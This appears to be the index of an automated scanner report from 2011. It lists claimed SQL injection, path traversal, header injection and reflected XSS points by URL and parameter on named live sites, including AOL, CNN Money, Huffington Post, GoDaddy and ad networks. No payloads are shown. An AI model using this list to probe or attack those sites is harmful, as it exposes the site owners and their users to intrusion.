Report generated by XSS.CX at Thu May 05 15:44:47 CDT 2011.


XSS, Cross Site Scripting in aol http systems, CWE-79, CAPEC-86, DORK, GHDB



1. SQL injection

1.1. http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter]

1.2. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

1.3. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [limit parameter]

1.4. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [name of an arbitrarily supplied request parameter]

1.5. http://aol.sportingnews.com/services/sn-promos/yearbooks.php [name of an arbitrarily supplied request parameter]

1.6. http://o.aolcdn.com/os/fanhouse/design/v2/css/fanhouse.css [REST URL parameter 2]

1.7. http://o.aolcdn.com/os/fonts/helvetica_lt_77_bold_condensed-webfont.woff [REST URL parameter 3]

1.8. http://o.aolcdn.com/os/mobile-desktop/js/mobileblog.js [REST URL parameter 2]

1.9. http://o.aolcdn.com/os/realestate/favicon.ico [REST URL parameter 2]

1.10. http://o.aolcdn.com/os_merge/ [file parameter]

1.11. http://widgets.digg.com/buttons/count [url parameter]

1.12. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

1.13. http://www.huffingtonpost.com/threeup.php [v parameter]

2. File path traversal

2.1. http://o.aolcdn.com/art/merge [f parameter]

2.2. http://o.aolcdn.com/art/merge/ [f parameter]

3. LDAP injection

4. HTTP header injection

4.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

4.2. http://ad.doubleclick.net/getcamphist [src parameter]

4.3. http://api.screenname.aol.com/auth/login [devId parameter]

4.4. http://api.screenname.aol.com/auth/login [f parameter]

4.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

4.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

4.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

4.8. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 2]

4.9. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 3]

4.10. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 4]

4.11. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 5]

4.12. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 6]

4.13. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 7]

4.14. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 2]

4.15. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 3]

4.16. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 4]

4.17. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 5]

4.18. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 6]

4.19. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 7]

4.20. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 2]

4.21. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 3]

4.22. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 4]

4.23. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 5]

4.24. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 6]

4.25. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 7]

4.26. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 2]

4.27. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 3]

4.28. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 4]

4.29. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 5]

4.30. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 6]

4.31. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 7]

4.32. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 2]

4.33. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 3]

4.34. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 4]

4.35. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 5]

4.36. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 6]

4.37. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 7]

4.38. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 2]

4.39. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 3]

4.40. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 4]

4.41. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 5]

4.42. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 6]

4.43. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 7]

4.44. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 8]

4.45. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 2]

4.46. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 3]

4.47. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 4]

4.48. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 5]

4.49. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 6]

4.50. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 7]

4.51. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 2]

4.52. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 3]

4.53. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 4]

4.54. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 5]

4.55. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 6]

4.56. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 7]

4.57. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 2]

4.58. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 3]

4.59. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 4]

4.60. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 5]

4.61. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 6]

4.62. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 7]

4.63. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 2]

4.64. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 3]

4.65. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 4]

4.66. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 5]

4.67. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 6]

4.68. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 7]

4.69. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 8]

4.70. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 2]

4.71. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 3]

4.72. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 4]

4.73. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 5]

4.74. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 6]

4.75. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 7]

4.76. http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]

4.77. http://search.aol.com/aol/tracking [name of an arbitrarily supplied request parameter]

4.78. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

4.79. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

5. Cross-site scripting (reflected)

5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

5.10. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]

5.11. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 2]

5.12. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]

5.13. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 2]

5.14. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 1]

5.15. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 2]

5.16. https://account.login.aol.com/_cqr/opr/opr.psp [authLev parameter]

5.17. https://account.login.aol.com/opr/_cqr/opr/opr.psp [authLev parameter]

5.18. http://ad.doubleclick.net/adj/huffpost.premium/front [name of an arbitrarily supplied request parameter]

5.19. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

5.20. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

5.21. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

5.22. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpt parameter]

5.23. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [mpvc parameter]

5.24. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6 [name of an arbitrarily supplied request parameter]

5.25. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpt parameter]

5.26. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [mpvc parameter]

5.27. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0 [name of an arbitrarily supplied request parameter]

5.28. http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter]

5.29. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [body-class parameter]

5.30. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [name of an arbitrarily supplied request parameter]

5.31. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

5.32. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

5.33. http://apartments.rentedspaces.oodle.com/ [name of an arbitrarily supplied request parameter]

5.34. http://apartments.rentedspaces.oodle.com/ [post_redirect parameter]

5.35. http://api.screenname.aol.com/auth/getToken [c parameter]

5.36. https://api.screenname.aol.com/auth/getToken [c parameter]

5.37. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]

5.38. http://apps.conduit.com/TechCrunch_App-Techcrunch_News [REST URL parameter 1]

5.39. http://ar.voicefive.com/b/rc.pli [func parameter]

5.40. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

5.41. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

5.42. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

5.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

5.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

5.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

5.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

5.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

5.48. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]

5.49. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.50. http://b.scorecardresearch.com/beacon.js [c10 parameter]

5.51. http://b.scorecardresearch.com/beacon.js [c15 parameter]

5.52. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.53. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.54. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.55. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.56. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.57. http://bid.openx.net/json [c parameter]

5.58. http://c.aol.com/read/get_topics [callback parameter]

5.59. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpt parameter]

5.60. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpvc parameter]

5.61. http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpck parameter]

5.62. http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpvc parameter]

5.63. http://choices.truste.com/ca [c parameter]

5.64. http://choices.truste.com/ca [h parameter]

5.65. http://choices.truste.com/ca [iplc parameter]

5.66. http://choices.truste.com/ca [ox parameter]

5.67. http://choices.truste.com/ca [plc parameter]

5.68. http://choices.truste.com/ca [w parameter]

5.69. http://choices.truste.com/ca [zi parameter]

5.70. http://coverage.mqcdn.com/coverage [REST URL parameter 1]

5.71. http://coverage.mqcdn.com/coverage [cat parameter]

5.72. http://coverage.mqcdn.com/coverage [jsonp parameter]

5.73. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]

5.74. http://d.tradex.openx.com/afr.php [cb parameter]

5.75. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]

5.76. http://d.tradex.openx.com/afr.php [zoneid parameter]

5.77. http://dev.aol.com/ [name of an arbitrarily supplied request parameter]

5.78. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 1]

5.79. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 2]

5.80. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 3]

5.81. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 4]

5.82. http://digg.com/submit [REST URL parameter 1]

5.83. http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 1]

5.84. http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 2]

5.85. http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 1]

5.86. http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 2]

5.87. http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 1]

5.88. http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 2]

5.89. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]

5.90. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]

5.91. http://help.aol.com/help/microsites/search.do [name of an arbitrarily supplied request parameter]

5.92. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

5.93. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

5.94. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpck parameter]

5.95. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpck parameter]

5.96. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpvc parameter]

5.97. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpvc parameter]

5.98. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpck parameter]

5.99. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpck parameter]

5.100. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpvc parameter]

5.101. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpvc parameter]

5.102. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpck parameter]

5.103. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpck parameter]

5.104. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpvc parameter]

5.105. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js [mpvc parameter]

5.106. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 2]

5.107. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 2]

5.108. http://mobile.aol.com/product/Android/dailyfinance/ [REST URL parameter 3]

5.109. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 2]

5.110. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 2]

5.111. http://mobile.aol.com/product/iPhone/Autos/ [REST URL parameter 3]

5.112. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 2]

5.113. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 2]

5.114. http://mobile.aol.com/product/iPhone/aim/ [REST URL parameter 3]

5.115. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 2]

5.116. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 2]

5.117. http://mobile.aol.com/product/iPhone/aol-radio/ [REST URL parameter 3]

5.118. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 2]

5.119. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 2]

5.120. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 3]

5.121. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 2]

5.122. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 2]

5.123. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 3]

5.124. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 2]

5.125. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 2]

5.126. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 3]

5.127. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 2]

5.128. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 2]

5.129. http://mobile.aol.com/product/iPhone/mail/ [REST URL parameter 3]

5.130. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 2]

5.131. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 2]

5.132. http://mobile.aol.com/product/iPhone/search/ [REST URL parameter 3]

5.133. http://music.aol.com/radioguide/bb [REST URL parameter 2]

5.134. http://music.aol.com/radioguide/bb [REST URL parameter 2]

5.135. http://my.screenname.aol.com/_cqr/login/checkStatus.psp [cb parameter]

5.136. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]

5.137. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]

5.138. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter]

5.139. https://my.screenname.aol.com/_cqr/login/login.psp [createSn parameter]

5.140. https://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]

5.141. https://my.screenname.aol.com/_cqr/login/login.psp [offerId parameter]

5.142. https://my.screenname.aol.com/_cqr/login/login.psp [siteState parameter]

5.143. https://my.screenname.aol.com/_cqr/login/login.psp [uitype parameter]

5.144. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp [authLev parameter]

5.145. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp [brandless parameter]

5.146. https://my.screenname.aol.com/badbrowser.psp [authLev parameter]

5.147. https://my.screenname.aol.com/badbrowser.psp [authLev parameter]

5.148. https://my.screenname.aol.com/badbrowser.psp [offerId parameter]

5.149. https://my.screenname.aol.com/badbrowser.psp [offerId parameter]

5.150. https://my.screenname.aol.com/badbrowser.psp [sitedomain parameter]

5.151. https://my.screenname.aol.com/badbrowser.psp [sitedomain parameter]

5.152. http://o.aolcdn.com/smartbox/SBG/REST/ [callback parameter]

5.153. http://pglb.buzzfed.com/10032/f4f3ccafe3fc01872a82127ebf3deddd [callback parameter]

5.154. http://portal.pf.aol.com/jsonmfus/ws [callback parameter]

5.155. http://portal.pf.aol.com/jsonqpus/ws [callback parameter]

5.156. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/ [name of an arbitrarily supplied request parameter]

5.157. http://realestate.aol.com/blog/rental-listings [REST URL parameter 2]

5.158. http://search.twitter.com/search [q parameter]

5.159. http://sportingnews.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

5.160. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

5.161. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

5.162. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

5.163. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

5.164. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

5.165. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

5.166. http://view.c3metrics.com/v.js [cid parameter]

5.167. http://view.c3metrics.com/v.js [id parameter]

5.168. http://view.c3metrics.com/v.js [t parameter]

5.169. http://www.aolnews.com/category/goodnews/ [REST URL parameter 2]

5.170. http://www.bankrate.com/funnel/mortgages/ [name of an arbitrarily supplied request parameter]

5.171. http://www.citysbest.com/ [icid parameter]

5.172. http://www.citysbest.com/ [name of an arbitrarily supplied request parameter]

5.173. http://www.citysbest.com/traffic/ [REST URL parameter 1]

5.174. http://www.citysbest.com/traffic/ [REST URL parameter 1]

5.175. http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2]

5.176. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [REST URL parameter 2]

5.177. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [name of an arbitrarily supplied request parameter]

5.178. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [REST URL parameter 3]

5.179. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [name of an arbitrarily supplied request parameter]

5.180. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [REST URL parameter 3]

5.181. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [name of an arbitrarily supplied request parameter]

5.182. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [REST URL parameter 3]

5.183. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [name of an arbitrarily supplied request parameter]

5.184. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

5.185. http://www.huffingtonpost.com/ [icid parameter]

5.186. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

5.187. http://www.huffingtonpost.com/2011/05/02/ [name of an arbitrarily supplied request parameter]

5.188. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html [name of an arbitrarily supplied request parameter]

5.189. http://www.huffingtonpost.com/2011/05/04/ [name of an arbitrarily supplied request parameter]

5.190. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html [name of an arbitrarily supplied request parameter]

5.191. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html [name of an arbitrarily supplied request parameter]

5.192. http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter]

5.193. http://www.huffingtonpost.com/ads/check_flights.php [spot parameter]

5.194. http://www.huffingtonpost.com/advertise/ [name of an arbitrarily supplied request parameter]

5.195. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

5.196. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

5.197. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

5.198. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

5.199. http://www.huffingtonpost.com/users/logout/ [name of an arbitrarily supplied request parameter]

5.200. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 1]

5.201. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 2]

5.202. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

5.203. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

5.204. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

5.205. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

5.206. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

5.207. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

5.208. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

5.209. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

5.210. http://www.moviefone.com/ [name of an arbitrarily supplied request parameter]

5.211. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]

5.212. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]

5.213. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]

5.214. http://www.tuaw.com/hub/app-reviews [name of an arbitrarily supplied request parameter]

5.215. https://www.godaddy.com/gdshop/hosting/landing.asp [User-Agent HTTP header]

5.216. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]

5.217. https://www.godaddy.com/gdshop/website.asp [User-Agent HTTP header]

5.218. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

5.219. http://aol.com/ [name of an arbitrarily supplied request parameter]

5.220. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

5.221. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

5.222. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.223. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

5.224. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

5.225. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

5.226. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

5.227. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

5.228. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

5.229. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

5.230. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

5.231. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

5.232. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

5.233. http://developer.aol.com/ [name of an arbitrarily supplied request parameter]

5.234. http://engadget.com/ [name of an arbitrarily supplied request parameter]

5.235. http://jsyk.com/ [name of an arbitrarily supplied request parameter]

5.236. http://mmafighting.com/traffic/ [bv parameter]

5.237. http://mmafighting.com/traffic/ [cb parameter]

